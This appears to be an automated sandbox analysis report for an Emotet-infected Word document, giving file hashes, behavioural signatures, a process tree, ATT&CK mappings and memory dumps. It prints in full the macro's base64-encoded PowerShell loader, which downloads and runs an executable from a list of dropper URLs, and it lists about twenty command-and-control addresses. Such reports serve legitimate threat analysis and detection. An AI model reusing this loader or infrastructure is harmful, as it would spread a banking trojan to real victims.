emotet | a1a6d0894d959f22ac18750f7ff3e1e5f3fff33b50bbbf2428b3a7c295c54175

General

Target

SWLVA09.19.doc
Size

177KB
MD5

381e2ab5974fdfbff1c507747ac17e12
SHA1

caf54d8965db7cc1120a9b5e420c8913ed74942e
SHA256

a1a6d0894d959f22ac18750f7ff3e1e5f3fff33b50bbbf2428b3a7c295c54175
SHA512

6675315e2d403ca9069a3e2dd67791cebb45f8ba3882f501b57ab2b823e16c1641901d1d20c15ba475afe6d45c2f06b6d91d03af39b99c4e08300e31d43da908

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://reseller-demo-website.com/discussion/qWWf8FS/

exe.dropper

https://www.mockdumps.com/test/Z2pJ/

exe.dropper

https://twisterprint.com/chrometheme/Vcr/

exe.dropper

http://simulations.org/rw_common/KfX2MW/

exe.dropper

http://planosdesaudesemcarencia.com/erros/JHoq/

exe.dropper

https://viaje-achina.com/wp-admin/A1O8tL/

exe.dropper

https://cearacultural.com.br/turismo/oy/

Extracted

Family

emotet

C2

71.72.196.159:80

134.209.36.254:8080

120.138.30.150:8080

94.23.216.33:80

157.245.99.39:8080

137.59.187.107:8080

94.23.237.171:443

61.19.246.238:443

156.155.166.221:80

50.35.17.13:80

153.137.36.142:80

91.211.88.52:7080

209.141.54.221:8080

185.94.252.104:443

174.45.13.118:80

87.106.136.232:8080

62.75.141.82:80

213.196.135.145:80

188.219.31.12:80

82.80.155.43:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2612	3896	powershell.exe

Emotet Payload 8 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/2208-16-0x0000000000500000-0x0000000000512000-memory.dmp	emotet
behavioral2/memory/2208-16-0x0000000000500000-0x0000000000512000-memory.dmp	emotet
behavioral2/memory/2208-17-0x0000000000620000-0x0000000000630000-memory.dmp	emotet
behavioral2/memory/2208-17-0x0000000000620000-0x0000000000630000-memory.dmp	emotet
behavioral2/memory/3788-20-0x0000000000620000-0x0000000000632000-memory.dmp	emotet
behavioral2/memory/3788-20-0x0000000000620000-0x0000000000632000-memory.dmp	emotet
behavioral2/memory/3788-21-0x00000000001F0000-0x0000000000200000-memory.dmp	emotet
behavioral2/memory/3788-21-0x00000000001F0000-0x0000000000200000-memory.dmp	emotet

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

22 2612 powershell.exe
24 2612 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Avbjjxx_b.exembsmsapi.exe

pid process

2208 Avbjjxx_b.exe
3788 mbsmsapi.exe
Drops file in System32 directory 1 IoCs

Processes:

Avbjjxx_b.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\kbdarmph\mbsmsapi.exe Avbjjxx_b.exe

flow	pid	process
22	2612	powershell.exe
24	2612	powershell.exe

pid	process
2208	Avbjjxx_b.exe
3788	mbsmsapi.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\kbdarmph\mbsmsapi.exe	Avbjjxx_b.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4028 WINWORD.EXE
4028 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exembsmsapi.exe

pid process

2612 powershell.exe
2612 powershell.exe
2612 powershell.exe
3788 mbsmsapi.exe
3788 mbsmsapi.exe
3788 mbsmsapi.exe
3788 mbsmsapi.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2612 powershell.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

WINWORD.EXE

pid process

4028 WINWORD.EXE
4028 WINWORD.EXE
4028 WINWORD.EXE
4028 WINWORD.EXE
4028 WINWORD.EXE
4028 WINWORD.EXE
4028 WINWORD.EXE
4028 WINWORD.EXE
4028 WINWORD.EXE

pid	process
4028	WINWORD.EXE
4028	WINWORD.EXE

pid	process
2612	powershell.exe
2612	powershell.exe
2612	powershell.exe
3788	mbsmsapi.exe
3788	mbsmsapi.exe
3788	mbsmsapi.exe
3788	mbsmsapi.exe

description	pid	process
Token: SeDebugPrivilege	2612	powershell.exe

pid	process
4028	WINWORD.EXE
4028	WINWORD.EXE
4028	WINWORD.EXE
4028	WINWORD.EXE
4028	WINWORD.EXE
4028	WINWORD.EXE
4028	WINWORD.EXE
4028	WINWORD.EXE
4028	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

powershell.exeAvbjjxx_b.exe

description	pid	process	target process
PID 2612 wrote to memory of 2208	2612	powershell.exe	Avbjjxx_b.exe
PID 2612 wrote to memory of 2208	2612	powershell.exe	Avbjjxx_b.exe
PID 2612 wrote to memory of 2208	2612	powershell.exe	Avbjjxx_b.exe
PID 2208 wrote to memory of 3788	2208	Avbjjxx_b.exe	mbsmsapi.exe
PID 2208 wrote to memory of 3788	2208	Avbjjxx_b.exe	mbsmsapi.exe
PID 2208 wrote to memory of 3788	2208	Avbjjxx_b.exe	mbsmsapi.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SWLVA09.19.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwAGUARQBcAEQAYQAzAEkAcABmAHYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBDAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAcgBpAHQAYAB5AGAAcABSAG8AdABPAGAAQwBvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAxADIAJwArACcALAAnACsAJwAgACcAKQArACcAdABsACcAKwAnAHMAJwArACcAMQAxACcAKwAoACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABQADQAZAA1AGIAZABpACAAPQAgACgAKAAnAEEAdgAnACsAJwBiACcAKQArACgAJwBqAGoAeAB4ACcAKwAnAF8AJwApACsAJwBiACcAKQA7ACQATgBsAGQAaQBrAHEAaQA9ACgAJwBFACcAKwAoACcAMgBwACcAKwAnAGoANwAnACsAJwBqAGcAJwApACkAOwAkAEMAZgBfAHkAbAA3AHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ASQB4AF8AJwArACgAJwB1ADAAJwArACcAZQBlACcAKQArACcAewAwAH0ARABhADMAaQAnACsAJwBwAGYAJwArACcAdgB7ADAAJwArACcAfQAnACkAIAAtAGYAWwBjAGgAYQByAF0AOQAyACkAKwAkAFAANABkADUAYgBkAGkAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABaAHoAZABkAG4AbgBsAD0AKAAnAEYAJwArACcANQBkACcAKwAoACcAbAAnACsAJwBvAF8AeQAnACkAKQA7ACQAWAA0ADcANABmAHkAMgA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgB3AGUAYgBjAEwAaQBFAE4AdAA7ACQAUQBhADkAdwA1ADgAdwA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAcgBlAHMAZQAnACkAKwAoACcAbABsAGUAcgAtACcAKwAnAGQAZQAnACsAJwBtACcAKQArACcAbwAtACcAKwAnAHcAZQAnACsAJwBiAHMAJwArACcAaQAnACsAJwB0AGUAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAvACcAKwAoACcAZABpACcAKwAnAHMAYwB1AHMAJwApACsAKAAnAHMAJwArACcAaQBvAG4ALwBxAFcAVwBmACcAKwAnADgARgAnACkAKwAoACcAUwAnACsAJwAvACoAJwArACcAaAB0AHQAJwApACsAKAAnAHAAcwAnACsAJwA6AC8ALwB3ACcAKQArACcAdwB3ACcAKwAoACcALgBtACcAKwAnAG8AJwArACcAYwBrAGQAdQBtAHAAcwAuAGMAJwApACsAJwBvAG0AJwArACcALwAnACsAKAAnAHQAJwArACcAZQBzAHQALwAnACsAJwBaADIAcABKAC8AKgAnACsAJwBoACcAKQArACcAdAB0ACcAKwAoACcAcABzADoAJwArACcALwAnACkAKwAoACcALwB0ACcAKwAnAHcAaQAnACkAKwAoACcAcwAnACsAJwB0AGUAJwApACsAKAAnAHIAcAAnACsAJwByAGkAJwApACsAKAAnAG4AdAAnACsAJwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGMAaAByAG8AJwApACsAKAAnAG0AZQAnACsAJwB0AGgAZQAnACkAKwAoACcAbQBlAC8AVgAnACsAJwBjAHIAJwArACcALwAqACcAKQArACgAJwBoACcAKwAnAHQAdAAnACkAKwAoACcAcAA6AC8ALwAnACsAJwBzACcAKQArACcAaQBtACcAKwAoACcAdQAnACsAJwBsAGEAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAG8AcgAnACsAJwBnACcAKQArACcALwAnACsAKAAnAHIAdwBfAGMAJwArACcAbwBtACcAKQArACgAJwBtAG8AJwArACcAbgAvACcAKwAnAEsAZgAnACkAKwAnAFgAMgAnACsAKAAnAE0AVwAvACoAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwBwACcAKwAnAGwAYQAnACkAKwAnAG4AJwArACcAbwAnACsAKAAnAHMAJwArACcAZABlAHMAJwArACcAYQB1AGQAZQBzAGUAJwArACcAbQBjACcAKQArACcAYQAnACsAJwByAGUAJwArACcAbgBjACcAKwAnAGkAYQAnACsAJwAuACcAKwAnAGMAbwAnACsAKAAnAG0ALwAnACsAJwBlAHIAcgBvAHMALwAnACkAKwAnAEoAJwArACgAJwBIAG8AJwArACcAcQAvACoAaAB0ACcAKwAnAHQAcAAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwB2AGkAYQBqAGUAJwArACcALQBhACcAKQArACgAJwBjACcAKwAnAGgAaQBuAGEALgAnACkAKwAnAGMAJwArACcAbwBtACcAKwAoACcALwB3AHAAJwArACcALQAnACkAKwAoACcAYQBkACcAKwAnAG0AaQAnACsAJwBuAC8AQQAxAE8AOAB0ACcAKQArACcATAAnACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcABzACcAKwAnADoALwAnACkAKwAoACcALwBjAGUAJwArACcAYQByACcAKQArACgAJwBhAGMAdQBsACcAKwAnAHQAdQByAGEAJwArACcAbAAnACsAJwAuACcAKwAnAGMAbwBtAC4AYgAnACkAKwAoACcAcgAvACcAKwAnAHQAJwApACsAJwB1ACcAKwAoACcAcgAnACsAJwBpAHMAJwArACcAbQBvAC8AbwB5AC8AJwApACkALgAiAFMAcABMAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWQA2AHQAZwB6AGwAXwA9ACgAJwBVAG4AJwArACgAJwB3ADAAbQAzACcAKwAnADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABXAGsAZQBuADgAaQBnACAAaQBuACAAJABRAGEAOQB3ADUAOAB3ACkAewB0AHIAeQB7ACQAWAA0ADcANABmAHkAMgAuACIAZABgAG8AdwBuAEwAbwBhAGQAZgBpAGAATABlACIAKAAkAFcAawBlAG4AOABpAGcALAAgACQAQwBmAF8AeQBsADcAcgApADsAJABDAGMAeAAwADgAMAByAD0AKAAoACcAQQBkACcAKwAnAGIAcQBtADgAJwApACsAJwBiACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABDAGYAXwB5AGwANwByACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMgAzADgAMAAwACkAIAB7ACYAKAAnAEkAbgAnACsAJwB2AG8AawBlACcAKwAnAC0ASQB0AGUAbQAnACkAKAAkAEMAZgBfAHkAbAA3AHIAKQA7ACQAVABsAGEAMQBfAHMAegA9ACgAKAAnAE4AJwArACcAawBfADMAbQAnACkAKwAnAHkAcAAnACkAOwBiAHIAZQBhAGsAOwAkAEkAaABtAG4AMQA0AF8APQAoACcASgAnACsAJwBmACcAKwAoACcAdwBrACcAKwAnAHUAagA4ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLADcAdwBxAHoAYwBkAD0AKAAnAFkAJwArACgAJwBqAG8AeQByAG8AJwArACcAeQAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2612

C:\Users\Admin\Ix_u0ee\Da3ipfv\Avbjjxx_b.exe
"C:\Users\Admin\Ix_u0ee\Da3ipfv\Avbjjxx_b.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\SysWOW64\kbdarmph\mbsmsapi.exe
"C:\Windows\SysWOW64\kbdarmph\mbsmsapi.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3788

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Ix_u0ee\Da3ipfv\Avbjjxx_b.exe

Download Submit
C:\Users\Admin\ix_U0eE\Da3Ipfv\Avbjjxx_b.exe

Download Submit
C:\Windows\SysWOW64\kbdarmph\mbsmsapi.exe

Download Submit
memory/2208-13-0x0000000000000000-mapping.dmp

Download
memory/2208-17-0x0000000000620000-0x0000000000630000-memory.dmp

Filesize
64KB

Download
memory/2208-16-0x0000000000500000-0x0000000000512000-memory.dmp

Filesize
72KB

Download
memory/2612-11-0x000001F1EFBC0000-0x000001F1EFBC1000-memory.dmp

Filesize
4KB

Download
memory/2612-10-0x00007FFCC7980000-0x00007FFCC836C000-memory.dmp

Filesize
9.9MB

Download
memory/2612-12-0x000001F1EFE80000-0x000001F1EFE81000-memory.dmp

Filesize
4KB

Download
memory/3788-18-0x0000000000000000-mapping.dmp

Download
memory/3788-20-0x0000000000620000-0x0000000000632000-memory.dmp

Filesize
72KB

Download
memory/3788-21-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download
memory/4028-0-0x00007FFCCEBC0000-0x00007FFCCF286000-memory.dmp

Filesize
6.8MB

Download
memory/4028-9-0x0000027CD1AF4000-0x0000027CD1B05000-memory.dmp

Filesize
68KB

Download
memory/4028-8-0x0000027CD1AF4000-0x0000027CD1B05000-memory.dmp

Filesize
68KB

Download
memory/4028-7-0x0000027CD1AF4000-0x0000027CD1B05000-memory.dmp

Filesize
68KB

Download
memory/4028-6-0x0000027CD1AF4000-0x0000027CD1B05000-memory.dmp

Filesize
68KB

Download
memory/4028-5-0x0000027CD1F0F000-0x0000027CD1F20000-memory.dmp

Filesize
68KB

Download
memory/4028-4-0x0000027CD1AF4000-0x0000027CD1B05000-memory.dmp

Filesize
68KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads